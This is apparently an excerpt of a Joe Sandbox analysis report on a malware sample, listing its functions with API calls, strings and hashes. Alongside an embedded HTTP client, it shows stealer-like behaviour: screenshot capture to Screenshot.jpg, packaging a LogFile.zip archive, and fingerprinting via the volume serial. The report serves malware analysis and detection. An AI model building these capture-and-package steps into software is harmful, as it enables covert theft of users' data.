Instruction Fuzzy Hash: E5E1B361B0868681FB14EBADD0012B9A360FF45B98FC44131DE6D876D9DFBDE445E3A0

Function 00007FF7F12BD1E0 Relevance: 54.8, APIs: 1, Strings: 30, Instructions: 584COMMON

Download Yara Rule

Strings

Proxy-Connection, xrefs: 00007FF7F12BD7DD, 00007FF7F12BD7F7
If-Unmodified-Since, xrefs: 00007FF7F12BDA79
%s: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 00007FF7F12BDB14
Last-Modified, xrefs: 00007FF7F12BDA70
Referer, xrefs: 00007FF7F12BD4D4
HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 00007FF7F12BD937
Alt-Used: %s:%d, xrefs: 00007FF7F12BD796
Alt-Used, xrefs: 00007FF7F12BD77B
User-Agent, xrefs: 00007FF7F12BD27D
%s?%s, xrefs: 00007FF7F12BD341
Accept, xrefs: 00007FF7F12BD59A
GET, xrefs: 00007FF7F12BD319
Invalid TIMEVALUE, xrefs: 00007FF7F12BD9F5
Range: bytes=%s, xrefs: 00007FF7F12BD603
Referer: %s, xrefs: 00007FF7F12BD4EF
Accept: */*, xrefs: 00007FF7F12BD5AC
If-Modified-Since, xrefs: 00007FF7F12BDA88
1.0, xrefs: 00007FF7F12BD707
HTTP request too large, xrefs: 00007FF7F12BDA12
%s , xrefs: 00007FF7F12BD73A
Content-Range: bytes %s%lld/%lld, xrefs: 00007FF7F12BD6C5
Proxy-Connection: Keep-Alive, xrefs: 00007FF7F12BD80E
Content-Range: bytes 0-%lld/%lld, xrefs: 00007FF7F12BD68F
HEAD, xrefs: 00007FF7F12BD2E9
Accept-Encoding: %s, xrefs: 00007FF7F12BD53E
Range, xrefs: 00007FF7F12BD5DB
Content-Range, xrefs: 00007FF7F12BD655
Content-Range: bytes %s/%lld, xrefs: 00007FF7F12BD6DA
Accept-Encoding, xrefs: 00007FF7F12BD50D
1.1, xrefs: 00007FF7F12BD70E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Alt-Used$Alt-Used: %s:%d$Content-Range$Content-Range: bytes %s%lld/%lld$Content-Range: bytes %s/%lld$Content-Range: bytes 0-%lld/%lld$GET$HEAD$HTTP request too large$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$User-Agent
API String ID: 0-931929960
Opcode ID: 64ce2e67417166897317ad888b9eced8e7f2cdd374a3f25915fd3c4fb2c577b3
Instruction ID: bb5fef6942923ea71f450cb79aa41b897e6a072d7f1cf1ffb60057d69748b959
Opcode Fuzzy Hash: 64ce2e67417166897317ad888b9eced8e7f2cdd374a3f25915fd3c4fb2c577b3
Instruction Fuzzy Hash: D5529221B0878685FB19EBA994503F9A7A4EF49788FC80035DE6D876D5DFBCE444C3A0

Function 00007FF7F12B80A0 Relevance: 42.3, APIs: 14, Strings: 10, Instructions: 303
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7F12BAAE0: QueryPerformanceCounter.KERNEL32(?,?,?,00007FF7F12C3A53,?,?,?,?,?,?,?,?,Internal error clearing splay node = %d,00007FF7F12AFC5D), ref: 00007FF7F12BAAF7

Part of subcall function 00007FF7F12B21F0: htons.WS2_32 ref: 00007FF7F12B2238

setsockopt.WS2_32 ref: 00007FF7F12B8203
setsockopt.WS2_32 ref: 00007FF7F12B8272
WSAGetLastError.WS2_32 ref: 00007FF7F12B827C
getsockopt.WS2_32 ref: 00007FF7F12B832B
setsockopt.WS2_32 ref: 00007FF7F12B835A
setsockopt.WS2_32 ref: 00007FF7F12B839C
WSAGetLastError.WS2_32 ref: 00007FF7F12B83A6

Part of subcall function 00007FF7F12C5AB0: GetLastError.KERNEL32(?,?,?,?,?,00007FF7F12ADC46), ref: 00007FF7F12C5AD3

setsockopt.WS2_32 ref: 00007FF7F12B83E2
WSAGetLastError.WS2_32 ref: 00007FF7F12B83EC
setsockopt.WS2_32 ref: 00007FF7F12B8431
WSAGetLastError.WS2_32 ref: 00007FF7F12B843B
setsockopt.WS2_32 ref: 00007FF7F12B8480
WSAGetLastError.WS2_32 ref: 00007FF7F12B848A
WSAGetLastError.WS2_32 ref: 00007FF7F12B8550

Part of subcall function 00007FF7F12B8640: getsockname.WS2_32 ref: 00007FF7F12B86DB
Part of subcall function 00007FF7F12B8640: WSAGetLastError.WS2_32 ref: 00007FF7F12B86E5

Part of subcall function 00007FF7F12BAAE0: GetTickCount.KERNEL32 ref: 00007FF7F12BAB2D

Strings

Trying [%s]:%d..., xrefs: 00007FF7F12B8209
cf_socket_open() -> %d, fd=%qd, xrefs: 00007FF7F12B8198
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F12B815C
Failed to set TCP_KEEPINTVL on fd %qd: errno %d, xrefs: 00007FF7F12B8444
Trying %s:%d..., xrefs: 00007FF7F12B8212
Failed to set TCP_KEEPCNT on fd %qd: errno %d, xrefs: 00007FF7F12B8490
Failed to set SO_KEEPALIVE on fd %qd: errno %d, xrefs: 00007FF7F12B83AC
Failed to set TCP_KEEPIDLE on fd %qd: errno %d, xrefs: 00007FF7F12B83F5
Could not set TCP_NODELAY: %s, xrefs: 00007FF7F12B8297
@, xrefs: 00007FF7F12B82B4

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$setsockopt$CountCounterPerformanceQueryTickgetsocknamegetsockopthtons
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SO_KEEPALIVE on fd %qd: errno %d$Failed to set TCP_KEEPCNT on fd %qd: errno %d$Failed to set TCP_KEEPIDLE on fd %qd: errno %d$Failed to set TCP_KEEPINTVL on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3449839174-1591695899
Opcode ID: 21224ee5e1d8ce4273d4f391f1f8909067e9d34e81e55b6579ffe6d8ed8d71ff
Instruction ID: cafe6a7dd42340e17552111c2ba556bf120fa39931ebd317f74c0f39b31bea90
Opcode Fuzzy Hash: 21224ee5e1d8ce4273d4f391f1f8909067e9d34e81e55b6579ffe6d8ed8d71ff
Instruction Fuzzy Hash: 89D1D431B0868286F710EF6AD4447BAA360FF48B94F800139DA6D876D5DFBCE445D7A0

Function 00007FF7F12B2DD0 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 487
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%s connect -> %d, connected=%d, xrefs: 00007FF7F12B2F0E
%s assess started=%d, result=%d, xrefs: 00007FF7F12B3433
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00007FF7F12B34E8
all eyeballers failed, xrefs: 00007FF7F12B3411
%s trying next, xrefs: 00007FF7F12B3083
Connection timeout after %lld ms, xrefs: 00007FF7F12B353C
%s starting (timeout=%lldms), xrefs: 00007FF7F12B32B1, 00007FF7F12B33D4
%s connect timeout after %lldms, move on!, xrefs: 00007FF7F12B2EE7
%s done, xrefs: 00007FF7F12B3075, 00007FF7F12B3283, 00007FF7F12B33C2

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
API String ID: 2783962273-3359130258
Opcode ID: ea7675378e61296b6a7ad0aef74f3159fa35e7ee6510e834bf48cfb15cbe0526
Instruction ID: bed26a3c96d0e1e568d49690769cc43771cac7f380e7371aafae466419d66dc5
Opcode Fuzzy Hash: ea7675378e61296b6a7ad0aef74f3159fa35e7ee6510e834bf48cfb15cbe0526
Instruction Fuzzy Hash: FA32C222B0868586FB15EFA9C4402BCB3B1FB08B98F844235DE6D977D5DF78A552C390

Function 00007FF7F132D6B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateCompatibleDC.GDI32(00000000,00007FF7F132D68D), ref: 00007FF7F132D6D7
GetDC.USER32 ref: 00007FF7F132D6E2
CreateCompatibleBitmap.GDI32 ref: 00007FF7F132D6F0
SelectObject.GDI32 ref: 00007FF7F132D6FF
GetDC.USER32 ref: 00007FF7F132D707
BitBlt.GDI32 ref: 00007FF7F132D733
DeleteObject.GDI32 ref: 00007FF7F132D78B

Strings

, xrefs: 00007FF7F132D70D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CompatibleCreateObject$BitmapDeleteSelect
String ID:
API String ID: 2649417129-3916222277
Opcode ID: 22714aae1b63b9293d8a0d4ee888f82aa773feed96b0aa01a97f1c734155d147
Instruction ID: 845b6400675400ea7cdd6df1c4dc9bbd465bcd3e29f475386860972f9af0d2be
Opcode Fuzzy Hash: 22714aae1b63b9293d8a0d4ee888f82aa773feed96b0aa01a97f1c734155d147
Instruction Fuzzy Hash: 5621A636A08B8187D714EF21E41436AF760FB98B94F544139EA9E43B94DF7CD045CB80

Function 00007FF7F12C4840 Relevance: 13.7, APIs: 9, Instructions: 247
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32 ref: 00007FF7F12C48A8
WSASetLastError.WS2_32 ref: 00007FF7F12C4A49
WSASetLastError.WS2_32 ref: 00007FF7F12C4A88
Sleep.KERNEL32 ref: 00007FF7F12C4AA1
select.WS2_32 ref: 00007FF7F12C4AF4
WSAGetLastError.WS2_32 ref: 00007FF7F12C4B09
__WSAFDIsSet.WS2_32 ref: 00007FF7F12C4B82
__WSAFDIsSet.WS2_32 ref: 00007FF7F12C4BA0
Sleep.KERNEL32 ref: 00007FF7F12C4BEF

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$Sleep$select
String ID:
API String ID: 2442476585-0
Opcode ID: f0398666957f93719acc28cadf4acf8fd07e7547978437943352cb69dc42711a
Instruction ID: c2db30a93023b241d68fd92880faa1431504c20b7fea099b1092f0d2b8d31b17
Opcode Fuzzy Hash: f0398666957f93719acc28cadf4acf8fd07e7547978437943352cb69dc42711a
Instruction Fuzzy Hash: 31A10821B08AC286EB696F58D8143BAA294FF647B8F904234DB3D977C4DF7DA940C354

Function 00007FF7F12B6560 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 00007FF7F12B6605
WSAGetLastError.WS2_32 ref: 00007FF7F12B660E
WSASetLastError.WS2_32 ref: 00007FF7F12B6699

Strings

not connected yet, xrefs: 00007FF7F12B6741
connect to %s port %u from %s port %d failed: %s, xrefs: 00007FF7F12B66D5
connected, xrefs: 00007FF7F12B67CE
local address %s port %d..., xrefs: 00007FF7F12B6633

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$connect
String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 375857812-3816509080
Opcode ID: ef366d6777c4c2a75419f39645e902c094e0490a4b7c3cd8d531bf5384c74c5e
Instruction ID: 9dd87dceb6ffced6900cbf3fed2d50628a006b44f77bec72d20a2e8f0968c7a6
Opcode Fuzzy Hash: ef366d6777c4c2a75419f39645e902c094e0490a4b7c3cd8d531bf5384c74c5e
Instruction Fuzzy Hash: A561C321B0868285FB54EBA9D4003F9A751FB49BA4F844231DE7D8B7D5DFACE445C3A0

Function 00007FF7F132D3B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F132FA1C: SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FADB
Part of subcall function 00007FF7F132FA1C: CreateDirectoryW.KERNELBASE ref: 00007FF7F132FAF1
Part of subcall function 00007FF7F132FA1C: SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FB3A
Part of subcall function 00007FF7F132FA1C: SetCurrentDirectoryW.KERNEL32 ref: 00007FF7F132FB51
Part of subcall function 00007FF7F132FA1C: CreateDirectoryW.KERNELBASE ref: 00007FF7F132FB60
Part of subcall function 00007FF7F132FA1C: SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FB8D

Part of subcall function 00007FF7F1330B3C: GetWindowsDirectoryA.KERNEL32 ref: 00007FF7F1330B6C
Part of subcall function 00007FF7F1330B3C: GetVolumeInformationA.KERNELBASE ref: 00007FF7F1330BBA
Part of subcall function 00007FF7F1330B3C: wsprintfA.USER32 ref: 00007FF7F1330C18

SetCurrentDirectoryW.KERNEL32 ref: 00007FF7F132D482
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7F132D506
DeleteFileW.KERNELBASE ref: 00007FF7F132D513
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132D5E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132D5EE

Strings

\LogFile.zip, xrefs: 00007FF7F132D4B9
LogFile.zip, xrefs: 00007FF7F132D50C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Directory$Current$Create_invalid_parameter_noinfo_noreturn$DeleteFileInformationVolumeWindowswsprintf
String ID: LogFile.zip$\LogFile.zip
API String ID: 2048956897-64219389
Opcode ID: 4422c6c57ba5b6aa448b7d2a9ccdcfc47659359c487a1c949cfbbd17470857b0
Instruction ID: 8c86745a820af5901353fcd34505cbf9a113a5029bd0cb313ff852d5a21d650a
Opcode Fuzzy Hash: 4422c6c57ba5b6aa448b7d2a9ccdcfc47659359c487a1c949cfbbd17470857b0
Instruction Fuzzy Hash: 40512463F18AC692EB00EB64D4501BDA370FFD5344F901236E6AD929E9DFACE544C790

Function 00007FF7F131BE2C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7F131C878,?,?,?,?,00007FF7F1318D31,?,?,?,?,00007FF7F12FB248), ref: 00007FF7F131BFA8
GetProcAddress.KERNEL32(?,?,?,00007FF7F131C878,?,?,?,?,00007FF7F1318D31,?,?,?,?,00007FF7F12FB248), ref: 00007FF7F131BFB4

Strings

api-ms-, xrefs: 00007FF7F131BEF2
ext-ms-, xrefs: 00007FF7F131BF05

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: e867a896a585152ae45827db36ee331074f5c95efb8fb85160f6ba5156a0a05c
Instruction ID: 93e631d18b9cc5902a8260bf08428e7b45462bf72a89736720c2ad243eec7847
Opcode Fuzzy Hash: e867a896a585152ae45827db36ee331074f5c95efb8fb85160f6ba5156a0a05c
Instruction Fuzzy Hash: 0F414722F0864283EB15EB169800575A3A1FF45BB0F86513DDD6DA77C8DFBDE40983A1

Function 00007FF7F1316A08 Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1316E35

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: a739afd6363db4907d837864cb59bc250a103b16810d7eec020c9d47b9a61ea7
Instruction ID: 5dd18664521935f94ad1e3c4f932396c968270a0b269ee404225a8c0bb4ac642
Opcode Fuzzy Hash: a739afd6363db4907d837864cb59bc250a103b16810d7eec020c9d47b9a61ea7
Instruction Fuzzy Hash: DAC107A2D0C79683EB206B5594402BDBB91EF80BA0FD64138D96E133D1DFFCE44583A1

Function 00007FF7F12B6950 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF7F12B69C5
WSAGetLastError.WS2_32 ref: 00007FF7F12B69D4
WSAIoctl.WS2_32 ref: 00007FF7F12B6AAD
setsockopt.WS2_32 ref: 00007FF7F12B6AE2

Strings

send(len=%zu) -> %d, err=%d, xrefs: 00007FF7F12B6B07
Send failure: %s, xrefs: 00007FF7F12B6A06

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorIoctlLastsendsetsockopt
String ID: Send failure: %s$send(len=%zu) -> %d, err=%d
API String ID: 2224487826-343019339
Opcode ID: 194f35ccac99204ccc3451a83f7b647ae1ba871b9da5a4ebe47e6d78843a4199
Instruction ID: 551c8a6e1a519f087f7a22a073dda30575ff713ca040aac540468d8faecb0562
Opcode Fuzzy Hash: 194f35ccac99204ccc3451a83f7b647ae1ba871b9da5a4ebe47e6d78843a4199
Instruction Fuzzy Hash: B651A372A08B8186E760DF69E5807AAB3A0FB88B94F404131DF9D47795EFBCD185CB50

Function 00007FF7F1330B3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32 ref: 00007FF7F1330B6C
GetVolumeInformationA.KERNELBASE ref: 00007FF7F1330BBA
wsprintfA.USER32 ref: 00007FF7F1330C18

Strings

%08lX%04lX%lu, xrefs: 00007FF7F1330BFC
QuBi, xrefs: 00007FF7F1330BC7

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu$QuBi
API String ID: 3001812590-333039331
Opcode ID: bc176afd4421eac289a9c25a97889cd52107ddcacc10b61251182c11cd72f80a
Instruction ID: 8ff3539424f7c060cd2ca93e7c7fbd57bdb9b7768348c14fd645d2528d9b7a8a
Opcode Fuzzy Hash: bc176afd4421eac289a9c25a97889cd52107ddcacc10b61251182c11cd72f80a
Instruction Fuzzy Hash: 4621CE32608781CBD324CF78E85069ABBA5FB89748F54513AE79987A58DBBCC109CB50

Function 00007FF7F12B6B60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF7F12B6BB2
WSAGetLastError.WS2_32 ref: 00007FF7F12B6BC4

Strings

Recv failure: %s, xrefs: 00007FF7F12B6C13
recv(len=%zu) -> %d, err=%d, xrefs: 00007FF7F12B6BE7, 00007FF7F12B6C38

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastrecv
String ID: Recv failure: %s$recv(len=%zu) -> %d, err=%d
API String ID: 2514157807-2495832097
Opcode ID: 1978edd4556ee24776eb1c4539b2f314356fb78c9ed98667ec1acd288cacf739
Instruction ID: 9a5d902e906681155f3c404b595345b76867add51d99396f096803b89607389a
Opcode Fuzzy Hash: 1978edd4556ee24776eb1c4539b2f314356fb78c9ed98667ec1acd288cacf739
Instruction Fuzzy Hash: 9A31C372B086818AE725EF56E8407A9B7A0BB4CBA4F404135DEAD477D1DF7CE041D790

Function 00007FF7F12B8640 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FF7F12B86DB
WSAGetLastError.WS2_32 ref: 00007FF7F12B86E5

Part of subcall function 00007FF7F12C5AB0: GetLastError.KERNEL32(?,?,?,?,?,00007FF7F12ADC46), ref: 00007FF7F12C5AD3

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F12B876D
getsockname() failed with errno %d: %s, xrefs: 00007FF7F12B8705

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$getsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 3066790409-2605427207
Opcode ID: a203559e7605fe364c2675ff617f0913964b67004d2bfd3391f550fd369d091a
Instruction ID: 6587070af1a2291af9d1aff73433f4c945ab85568e686f467ea62487321e3569
Opcode Fuzzy Hash: a203559e7605fe364c2675ff617f0913964b67004d2bfd3391f550fd369d091a
Instruction Fuzzy Hash: B131A722B187C282E720EB15D4003FEA350FB8D758F845235EAAC476D6DFACE5918B90

Function 00007FF7F132D7BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryfilewindowCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS ref: 00007FF7F132D7E2
GdipCreateBitmapFromHBITMAP.GDIPLUS ref: 00007FF7F132D816
GdipSaveImageToFile.GDIPLUS ref: 00007FF7F132D861

Strings

\Screenshot.jpg, xrefs: 00007FF7F132D834

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

